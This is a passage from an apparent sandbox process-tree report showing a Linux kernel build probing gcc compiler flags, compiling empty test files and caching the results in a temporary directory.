-fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 --param=allow-store-data-races=0 -DCC_HAVE_ASM_GOTO -Wframe-larger-than=1024 -fstack-protector-strong -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -mrecord-mcount -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"y\"; else echo \"n\"; fi"3⤵PID:1965
-
/bin/mkdirmkdir -p /tmp/a/.tmp_19654⤵PID:1966
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration "-Werror=return-type" -Wno-format-security "-std=gnu89" -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -funit-at-a-time -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_FXSAVEQ=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_CRC32=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 "--param=allow-store-data-races=0" -DCC_HAVE_ASM_GOTO "-Wframe-larger-than=1024" -fstack-protector-strong -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -mrecord-mcount -c -x c /dev/null -o /tmp/a/.tmp_1965/tmp4⤵PID:1967
-
/usr/lib/gcc/x86_64-linux-gnu/7/cc1/usr/lib/gcc/x86_64-linux-gnu/7/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_FXSAVEQ=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_CRC32=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" -D CC_HAVE_ASM_GOTO /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mrecord-mcount "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1965/tmp -O2 -Werror -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-int-in-bool-context "-Wframe-larger-than=1024" -Wno-unused-but-set-variable "-Wunused-const-variable=0" "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-falign-jumps=1" "-falign-loops=1" -funit-at-a-time -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments --param "allow-store-data-races=0" -fstack-protector-strong -o -5⤵PID:1968
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1965/tmp5⤵PID:1969
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1965/tmp5⤵PID:1969
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1965/tmp5⤵PID:1969
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1965/tmp5⤵
- Writes file to tmp directory
PID:1969 -
/bin/rmrm -rf /tmp/a/.tmp_19654⤵PID:1970
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if___gcc_-Werror_-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Werror_return-type_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls_-fno-var-tracking-assignments_-mrecord-mcount_-c_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"y\";_else_echo_\"n\";_fi := y' >> /tmp/a/.cache.mk"3⤵PID:1971
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -funit-at-a-time -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_FXSAVEQ=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_CRC32=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 --param=allow-store-data-races=0 -DCC_HAVE_ASM_GOTO -Wframe-larger-than=1024 -fstack-protector-strong -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -mfentry -DCC_USING_FENTRY -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \" -mfentry -DCC_USING_FENTRY\"; else echo \"\"; fi"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1972 -
/bin/mkdirmkdir -p /tmp/a/.tmp_19724⤵PID:1973
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration "-Werror=return-type" -Wno-format-security "-std=gnu89" -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -funit-at-a-time -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_FXSAVEQ=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_CRC32=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 "--param=allow-store-data-races=0" -DCC_HAVE_ASM_GOTO "-Wframe-larger-than=1024" -fstack-protector-strong -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -mfentry -DCC_USING_FENTRY -c -x c /dev/null -o /tmp/a/.tmp_1972/tmp4⤵PID:1974
-
/usr/lib/gcc/x86_64-linux-gnu/7/cc1/usr/lib/gcc/x86_64-linux-gnu/7/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_FXSAVEQ=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_CRC32=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" -D CC_HAVE_ASM_GOTO -D CC_USING_FENTRY /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mfentry "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1972/tmp -O2 -Werror -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-int-in-bool-context "-Wframe-larger-than=1024" -Wno-unused-but-set-variable "-Wunused-const-variable=0" "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-falign-jumps=1" "-falign-loops=1" -funit-at-a-time -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments --param "allow-store-data-races=0" -fstack-protector-strong -o -5⤵PID:1975
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1972/tmp5⤵PID:1976
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1972/tmp5⤵PID:1976
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1972/tmp5⤵PID:1976
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1972/tmp5⤵
- Writes file to tmp directory
PID:1976 -
/bin/rmrm -rf /tmp/a/.tmp_19724⤵PID:1977
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Werror_return-type_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls_-fno-var-tracking-assignments__-mfentry_-DCC_USING_FENTRY_-c_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"_-mfentry_-DCC_USING_FENTRY\";_else_echo_\"\";_fi := -mfentry -DCC_USING_FENTRY' >> /tmp/a/.cache.mk"3⤵PID:1978
-
/usr/local/sbin/gccgcc "-print-file-name=include"3⤵PID:1979
-
/usr/local/bin/gccgcc "-print-file-name=include"3⤵PID:1979
-
/usr/sbin/gccgcc "-print-file-name=include"3⤵PID:1979
-
/usr/bin/gccgcc "-print-file-name=include"3⤵PID:1979
-
/bin/sh/bin/sh -c "echo '__cached_gcc_-print-file-name_include := /usr/lib/gcc/x86_64-linux-gnu/7/include' >> /tmp/a/.cache.mk"3⤵PID:1980
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -funit-at-a-time -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_FXSAVEQ=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_CRC32=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 --param=allow-store-data-races=0 -DCC_HAVE_ASM_GOTO -Wframe-larger-than=1024 -fstack-protector-strong -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wdeclaration-after-statement\"; else echo \"\"; fi"3⤵PID:1981
-
/bin/mkdirmkdir -p /tmp/a/.tmp_19814⤵PID:1982
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration "-Werror=return-type" -Wno-format-security "-std=gnu89" -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -funit-at-a-time -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_FXSAVEQ=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_CRC32=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 "--param=allow-store-data-races=0" -DCC_HAVE_ASM_GOTO "-Wframe-larger-than=1024" -fstack-protector-strong -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -c -x c /dev/null -o /tmp/a/.tmp_1981/tmp4⤵PID:1983
-
/usr/lib/gcc/x86_64-linux-gnu/7/cc1/usr/lib/gcc/x86_64-linux-gnu/7/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_FXSAVEQ=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_CRC32=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" -D CC_HAVE_ASM_GOTO -D CC_USING_FENTRY /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mrecord-mcount -mfentry "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1981/tmp -O2 -Werror -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-int-in-bool-context "-Wframe-larger-than=1024" -Wno-unused-but-set-variable "-Wunused-const-variable=0" -Wdeclaration-after-statement "-std=gnu90" -p -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-falign-jumps=1" "-falign-loops=1" -funit-at-a-time -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments --param "allow-store-data-races=0" -fstack-protector-strong -o -5⤵PID:1984
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1981/tmp5⤵PID:1985
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1981/tmp5⤵PID:1985
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1981/tmp5⤵PID:1985
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1981/tmp5⤵
- Writes file to tmp directory
PID:1985 -
/bin/rmrm -rf /tmp/a/.tmp_19814⤵PID:1986
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Werror_return-type_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls_-fno-var-tracking-assignments_-pg_-mrecord-mcount_-mfentry_-DCC_USING_FENTRY_-Wdeclaration-after-statement_-c_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"-Wdeclaration-after-statement\";_else_echo_\"\";_fi := -Wdeclaration-after-statement' >> /tmp/a/.cache.mk"3⤵PID:1987
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -funit-at-a-time -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_FXSAVEQ=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_CRC32=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 --param=allow-store-data-races=0 -DCC_HAVE_ASM_GOTO -Wframe-larger-than=1024 -fstack-protector-strong -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wpointer-sign -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wno-pointer-sign\"; else echo \"\"; fi"3⤵PID:1988
-
/bin/mkdirmkdir -p /tmp/a/.tmp_19884⤵PID:1989
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration "-Werror=return-type" -Wno-format-security "-std=gnu89" -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -funit-at-a-time -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_FXSAVEQ=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_CRC32=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 "--param=allow-store-data-races=0" -DCC_HAVE_ASM_GOTO "-Wframe-larger-than=1024" -fstack-protector-strong -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wpointer-sign -c -x c /dev/null -o /tmp/a/.tmp_1988/tmp4⤵PID:1990
-
/usr/lib/gcc/x86_64-linux-gnu/7/cc1/usr/lib/gcc/x86_64-linux-gnu/7/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_FXSAVEQ=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_CRC32=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" -D CC_HAVE_ASM_GOTO -D CC_USING_FENTRY /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mrecord-mcount -mfentry "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1988/tmp -O2 -Werror -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-int-in-bool-context "-Wframe-larger-than=1024" -Wno-unused-but-set-variable "-Wunused-const-variable=0" -Wdeclaration-after-statement -Wpointer-sign "-std=gnu90" -p -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-falign-jumps=1" "-falign-loops=1" -funit-at-a-time -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments --param "allow-store-data-races=0" -fstack-protector-strong -o -5⤵PID:1991
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1988/tmp5⤵PID:1992
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1988/tmp5⤵PID:1992
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1988/tmp5⤵PID:1992
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1988/tmp5⤵PID:1992
-
/bin/rmrm -rf /tmp/a/.tmp_19884⤵PID:1993
-
